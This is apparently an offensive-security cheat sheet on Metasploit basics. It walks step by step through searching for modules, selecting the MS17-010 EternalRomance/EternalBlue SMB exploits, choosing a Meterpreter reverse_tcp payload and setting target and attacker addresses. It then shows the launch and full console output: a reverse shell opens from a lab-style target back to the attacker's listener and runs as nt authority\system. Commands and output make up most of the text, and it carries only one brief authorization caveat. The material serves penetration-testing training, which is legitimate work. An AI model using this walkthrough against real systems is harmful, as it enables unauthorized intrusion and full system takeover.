BASIC USAGE

INITIALIZATION

root@oco:~$ msfconsole -q

 * This launches the Metasploit Framework console and initializes its modules and 
   services. Modern Metasploit packages include a PostgreSQL database for storing 
   workspace data, so you normally don’t need to start PostgreSQL manually. If the 
   database becomes disconnected or corrupted, use "msfdb reinit" to recreate and 
   reconnect the DB. You can also check the DB status with msfdb status.
   
 * the -q flag is optional and disables the metasploit banner to include the following:
           =[ metasploit v6.1.9-dev                           ]
    + -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
    + -- --=[ 592 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 9 evasion                                       ]

SEARCHING FOR MODULES/CAPABILITY

msf6 > help search
 Usage: search [<options>] [<keywords>:<value>]

 OPTIONS:
  -h                   Show this help information
  -o <file>            Send output to a file in csv format
  -S <string>          Regex pattern used to filter search results
  -u                   Use module if there is one result
  -s <search_column>   Sort the research results based on <search_column> in ascending order
  -r                   Reverse the search results order to descending order
  ...

GENERAL

msf6 > search eternalromance
 Matching Modules
 ================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   1  auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

SPECIFIC

BY TYPE

msf6 > search eternalromance type:exploit
 Matching Modules
 ================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
    
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft
 Matching Modules
 ================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/windows/http/exchange_proxylogon_rce    2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
   1  exploit/windows/http/exchange_proxyshell_rce    2021-04-06       excellent  Yes    Microsoft Exchange ProxyShell RCE
   2  exploit/windows/http/sharepoint_unsafe_control  2021-05-11       excellent  Yes    Microsoft SharePoint Unsafe Control and ViewState RCE
   
 * types
    - cve:<year>
    - platform:<os>
    - type:<auxiliary/exploit/post>
    - rank:<rank>

BY CVE

msf6 > search platform:windows cve:2021

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/windows/http/exchange_proxylogon_rce    2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
   1  exploit/windows/http/exchange_proxyshell_rce    2021-04-06       excellent  Yes    Microsoft Exchange ProxyShell RCE
   2  exploit/windows/http/sharepoint_unsafe_control  2021-05-11       excellent  Yes    Microsoft SharePoint Unsafe Control and ViewState RCE

SELECTING MODULES/EXPLOIT

msf6 > use {id}
msf6 exploit(windows/smb/ms17_010_psexec) >
    
 * always perform a test to see whether the target is vulnerable to this exploit
   if there is an option to do so

DISPLAYING OPTIONS

BASIC VIEW

//BASIC OPTIONS
msf6> show options
 Module options (exploit/windows/smb/ms17_010_psexec): 

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DBGTRACE              false                                    yes       Show extra debug trace info
   LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
   NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                         rdlists/named_pipes.txt
   RHOSTS                                                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                            /wiki/Using-Metasploit
   RPORT                 445                                      yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                           no        The service display name
   SERVICE_NAME                                                   no        The service name
   SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a no
                                                                            rmal read/write folder share
   SMBDomain             .                                        no        The Windows domain to use for authentication
   SMBPass                                                        no        The password for the specified username
   SMBUser                                                        no        The username to authenticate as


 Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


 Exploit target:

   Id  Name
   --  ----
   0   Automatic
    
 * Everything required to be set before the exploitation can occur will have a Yes
   under the Required column.
   
 * options is simply the shorter, more convenient form; show options is the more 
   explicit form

ADVANCED VIEW

//ADVANCED OPTIONS
msf6> show {advanced | evasion | targets}
   
 * Use show advanced / show evasion / show targets for more info
    - show options is the basic view; other show subcommands reveal advanced 
      settings, evasion options, or supported exploit targets.

DESCRIPTION VIEW

//INFORMATION
msf6 exploit(windows/smb/ms17_010_psexec) > show info

        Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
      Module: exploit/windows/smb/ms17_010_psexec
    Platform: Windows
        Arch: x86, x64
  Privileged: No
     License: Metasploit Framework License (BSD)
        Rank: Normal
   Disclosed: 2017-03-14

 Provided by:
   sleepya
   zerosum0x0
   Shadow Brokers
   Equation Group

 Available targets:
   Id  Name
   --  ----
   0   Automatic
   1   PowerShell
   2   Native upload
   3   MOF upload

 Check supported:
   Yes

 Basic options:
   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DBGTRACE              false                                    yes       Show extra debug trace info
   LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
   NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                         rdlists/named_pipes.txt
   RHOSTS                                                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/
                                                                            wiki/Using-Metasploit
   RPORT                 445                                      yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                           no        The service display name
   SERVICE_NAME                                                   no        The service name
   SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a nor
                                                                            mal read/write folder share
   SMBDomain             .                                        no        The Windows domain to use for authentication
   SMBPass                                                        no        The password for the specified username
   SMBUser                                                        no        The username to authenticate as 

 Payload information:
   Space: 3072

 Description:
   This module will exploit SMB with vulnerabilities in MS17-010 to 
   achieve a write-what-where primitive. This will then be used to 
   overwrite the connection session information with as an 
   Administrator session. From there, the normal psexec payload code 
   execution is done. Exploits a type confusion between Transaction and 
   WriteAndX requests and a race condition in Transaction requests, as 
   seen in the EternalRomance, EternalChampion, and EternalSynergy 
   exploits. This exploit chain is more reliable than the EternalBlue 
   exploit, but requires a named pipe.

 References:
   https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
   https://nvd.nist.gov/vuln/detail/CVE-2017-0143
   https://nvd.nist.gov/vuln/detail/CVE-2017-0146
   https://nvd.nist.gov/vuln/detail/CVE-2017-0147
   https://github.com/worawit/MS17-010
   https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
   https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/

 Also known as:
   ETERNALSYNERGY
   ETERNALROMANCE
   ETERNALCHAMPION
   ETERNALBLUE

  * info gives the full module doc if you want a longer 
    description (including references and module path), use info <module> while in the
    module context.

  * use the command info after selecting the module if you want to know something more 
    about the module.
     - This will provide a series of information that can be important

DISPLAYING PAYLOADS

Before choosing a payload, define exactly what you MUST accomplish on the target system. Attack objectives drive payload selection. For example, if you require durable access and rich post-exploit capabilities (persistence, credential harvesting, lateral movement), a staged Meterpreter payload is often appropriate because it provides in-memory execution, dynamic plugin/script loading, and many built-in post-exploitation primitives. Meterpreter can be augmented with plugins (for example, GentilKiwi’s Mimikatz plugin - https://github.com/gentilkiwi/mimikatz) to collect credentials and perform advanced actions, but remember these tools are powerful and dual-use: only deploy them with explicit authorization and within your rules of engagement.

STAGED

root@oco:~$ show payloads
 ...
 535  windows/x64/meterpreter/bind_ipv6_tcp                                normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
 536  windows/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
 537  windows/x64/meterpreter/bind_named_pipe                              normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
 538  windows/x64/meterpreter/bind_tcp                                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
 539  windows/x64/meterpreter/bind_tcp_rc4                                 normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
 540  windows/x64/meterpreter/bind_tcp_uuid                                normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
 541  windows/x64/meterpreter/reverse_http                                 normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
 542  windows/x64/meterpreter/reverse_https                                normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
 543  windows/x64/meterpreter/reverse_named_pipe                           normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
 544  windows/x64/meterpreter/reverse_tcp                                  normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
 545  windows/x64/meterpreter/reverse_tcp_rc4                              normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
 546  windows/x64/meterpreter/reverse_tcp_uuid                             normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
 547  windows/x64/meterpreter/reverse_winhttp                              normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
 548  windows/x64/meterpreter/reverse_winhttps                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
 ...

ALL TYPES

msf6 > show payloads
 Payloads
 ========

    #    Name                                                Disclosure Date  Rank    Check  Description
 -    ----                                                ---------------  ----    -----  -----------
    0    aix/ppc/shell_bind_tcp                                               manual  No     AIX Command Shell, Bind TCP Inline
    1    aix/ppc/shell_find_port                                              manual  No     AIX Command Shell, Find Port Inline
    2    aix/ppc/shell_interact                                               manual  No     AIX execve Shell for inetd
    3    aix/ppc/shell_reverse_tcp                                            manual  No     AIX Command Shell, Reverse TCP Inline
    4    android/meterpreter/reverse_http                                     manual  No     Android Meterpreter, Android Reverse HTTP Stager
    5    android/meterpreter/reverse_https                                    manual  No     Android Meterpreter, Android Reverse HTTPS Stager
    6    android/meterpreter/reverse_tcp                                      manual  No     Android Meterpreter, Android Reverse TCP Stager
    7    android/meterpreter_reverse_http                                     manual  No     Android Meterpreter Shell, Reverse HTTP Inline
    8    android/meterpreter_reverse_https                                    manual  No     Android Meterpreter Shell, Reverse HTTPS Inline
    9    android/meterpreter_reverse_tcp                                      manual  No     Android Meterpreter Shell, Reverse TCP Inline
    10   android/shell/reverse_http                                           manual  No     Command Shell, Android Reverse HTTP Stager
    11   android/shell/reverse_https                                          manual  No     Command Shell, Android Reverse HTTPS Stager
    12   android/shell/reverse_tcp                                            manual  No     Command Shell, Android Reverse TCP Stager
    13   apple_ios/aarch64/meterpreter_reverse_http                           manual  No     Apple_iOS Meterpreter, Reverse HTTP Inline
   
    515  windows/x64/meterpreter/bind_ipv6_tcp                                manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
    516  windows/x64/meterpreter/bind_ipv6_tcp_uuid                           manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
    517  windows/x64/meterpreter/bind_named_pipe                              manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
    518  windows/x64/meterpreter/bind_tcp                                     manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
    519  windows/x64/meterpreter/bind_tcp_rc4                                 manual  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
    520  windows/x64/meterpreter/bind_tcp_uuid                                manual  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
    521  windows/x64/meterpreter/reverse_http                                 manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
    522  windows/x64/meterpreter/reverse_https                                manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
    523  windows/x64/meterpreter/reverse_named_pipe                           manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
    524  windows/x64/meterpreter/reverse_tcp                                  manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
    525  windows/x64/meterpreter/reverse_tcp_rc4                              manual  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
    526  windows/x64/meterpreter/reverse_tcp_uuid                             manual  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
    527  windows/x64/meterpreter/reverse_winhttp                              manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
    528  windows/x64/meterpreter/reverse_winhttps                             manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
    529  windows/x64/meterpreter_bind_named_pipe                              manual  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
    530  windows/x64/meterpreter_bind_tcp                                     manual  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
    531  windows/x64/meterpreter_reverse_http                                 manual  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
    532  windows/x64/meterpreter_reverse_https                                manual  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
    533  windows/x64/meterpreter_reverse_ipv6_tcp                             manual  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
    534  windows/x64/meterpreter_reverse_tcp                                  manual  No     Windows Meterpreter Shell, Reverse TCP Inline x64
   
 <SNIP>
   
    557  windows/x64/vncinject/reverse_tcp                                    manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
    558  windows/x64/vncinject/reverse_tcp_rc4                                manual  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
    559  windows/x64/vncinject/reverse_tcp_uuid                               manual  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
    560  windows/x64/vncinject/reverse_winhttp                                manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
    561  windows/x64/vncinject/reverse_winhttps                               manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

SPECIFIC PAYLOAD SEARCHING

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads

   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)


msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads

 [*] 14

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads

   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   
   
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter grep reverse_tcp show payloads

 [*] 3

PAYLOAD SELECTION

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
 Module options (exploit/windows/smb/ms17_010_eternalblue):
 
    Name           Current Setting  Required  Description
    ----           ---------------  --------  -----------
    RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT          445              yes       The target port (TCP)
    SMBDomain      .                no        (Optional) The Windows domain to use for authentication
    SMBPass                         no        (Optional) The password for the specified username
    SMBUser                         no        (Optional) The username to authenticate as
    VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
    VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.
 
 Exploit target:  

    Id  Name
    --  ----
    0   Windows 7 and Server 2008 R2 (x64) All Service Packs 

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads

    15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
    16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
    17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) 

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
 payload => windows/x64/meterpreter/reverse_tcp

SETTING OPTIONS

TARGET SPECIFICATION: TEMPORARY

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
 RHOSTS => 10.10.10.40

msf6 exploit(windows/smb/ms17_010_psexec) > show options
  Name                  Current Setting                          Required  Description
  ----                  ---------------                          --------  -----------
  DBGTRACE              false                                    yes       Show extra debug trace info
  LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
  NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
  NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                        rdlists/named_pipes.txt
  RHOSTS                10.10.10.40                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                           /wiki/Using-Metasploit
  RPORT                 445                                      yes       The Target port (TCP)
  SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                                           no        The service display name
  SERVICE_NAME                                                   no        The service name
  SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a no
                                                                           rmal read/write folder share
  SMBDomain             .                                        no        The Windows domain to use for authentication
  SMBPass                                                        no        The password for the specified username
  SMBUser                                                        no        The username to authenticate as

 Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


 Exploit target:

   Id  Name
   --  ----
   0   Automatic

 * RHOSTS	The IP address of the remote host, the target machine.
   RPORT	Does not require a change, just a check that we are on port 445, where SMB is running.
   LHOST	The host's IP address, the attacker's machine.
   LPORT	Does not require a change, just a check that the port is not already in use.

TARGET SPECIFICATION: SESSION DURATION

The "setg" cmd specifies options selected as permanent until the program is restarted. This cmd is used to set the IP address once until a different focus IP address is required

msf6 exploit(windows/smb/ms17_010_psexec) > setg RHOSTS 10.10.10.40
 RHOSTS => 10.10.10.40

msf6 exploit(windows/smb/ms17_010_psexec) > options

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DBGTRACE              false                                    yes       Show extra debug trace info
   LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
   NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                         rdlists/named_pipes.txt
   RHOSTS                10.10.10.40                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                            /wiki/Using-Metasploit
   RPORT                 445                                      yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                           no        The service display name
   SERVICE_NAME                                                   no        The service name
   SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a no
                                                                            rmal read/write folder share
   SMBDomain             .                                        no        The Windows domain to use for authentication
   SMBPass                                                        no        The password for the specified username
   SMBUser                                                        no        The username to authenticate as


 Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


 Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
   
 * RHOSTS	The IP address of the remote host, the target machine.
   RPORT	Does not require a change, just a check that we are on port 445, where SMB is running.
   LHOST	The host's IP address, the attacker's machine.
   LPORT	Does not require a change, just a check that the port is not already in use.

LOCAL HOST SPECIFICATION

msf6 exploit(windows/smb/ms17_010_psexec) > setg LHOST 10.10.14.15
 LHOSTS => 10.10.14.15

msf6 exploit(windows/smb/ms17_010_psexec) > options

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DBGTRACE              false                                    yes       Show extra debug trace info
   LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
   NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                         rdlists/named_pipes.txt
   RHOSTS                10.10.10.40                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                            /wiki/Using-Metasploit
   RPORT                 445                                      yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                           no        The service display name
   SERVICE_NAME                                                   no        The service name
   SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a no
                                                                            rmal read/write folder share
   SMBDomain             .                                        no        The Windows domain to use for authentication
   SMBPass                                                        no        The password for the specified username
   SMBUser                                                        no        The username to authenticate as


 Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.15      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

 Exploit target:

   Id  Name
   --  ----
   0   Automatic
   
 * the payload "windows/meterpreter/reverse_tcp" has been selected by MSF automatically
   as the default payload to use
    - if there is no default payload acompanying the exploit, a selection can be 
      made via "show payload" then "set payload" cmds
       
 * RHOSTS	The IP address of the remote host, the target machine.
   RPORT	Does not require a change, just a check that we are on port 445, where SMB is running.
   LHOST	The host's IP address, the attacker's machine.
   LPORT	Does not require a change, just a check that the port is not already in use.

FAILSAFE

//this is an advanced option
msf6 exploit> set exitonsession false 
 
 * all this means is that when you get a connection back, this handler is going to stay up & running
   and continue listening for more requests

LAUNCHING ATTACK

msf6 exploit(windows/smb/ms17_010_psexec) > {run | exploit} -j -z
 [*] Started reverse TCP handler on 10.10.14.15:4444 
 [*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
 [+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
 [*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
 [*] 10.10.10.40:445 - Connecting to target for exploitation.
 [+] 10.10.10.40:445 - Connection established for exploitation.
 [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
 [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
 [*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
 [*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
 [*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
 [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
 [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
 [*] 10.10.10.40:445 - Starting non-paged pool grooming
 [+] 10.10.10.40:445 - Sending SMBv2 buffers
 [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
 [*] 10.10.10.40:445 - Sending final SMBv2 buffers.
 [*] 10.10.10.40:445 - Sending last fragment of exploit packet!
 [*] 10.10.10.40:445 - Receiving response from exploit packet
 [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
 [*] 10.10.10.40:445 - Sending egg to corrupted connection.
 [*] 10.10.10.40:445 - Triggering free of corrupted buffer.
 [*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.40:49158) at 2020-08-13 21:37:21 +0000
 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter> shell
C:\Windows\system32>

 * the -j option is used to set the cmd as a job
 * the -z option is used to set the cmd in the background
 * the "shell" cmd is a Meterpreter specific cmd that drops into a system command shell
   on the target

TARGET INTERACTION

C:\Windows\system32> whoami
 whoami
 nt authority\system

PreviousENGAGEMENT STRUCTURE NextDUMPING IPMI HASHES

Last updated 11 days ago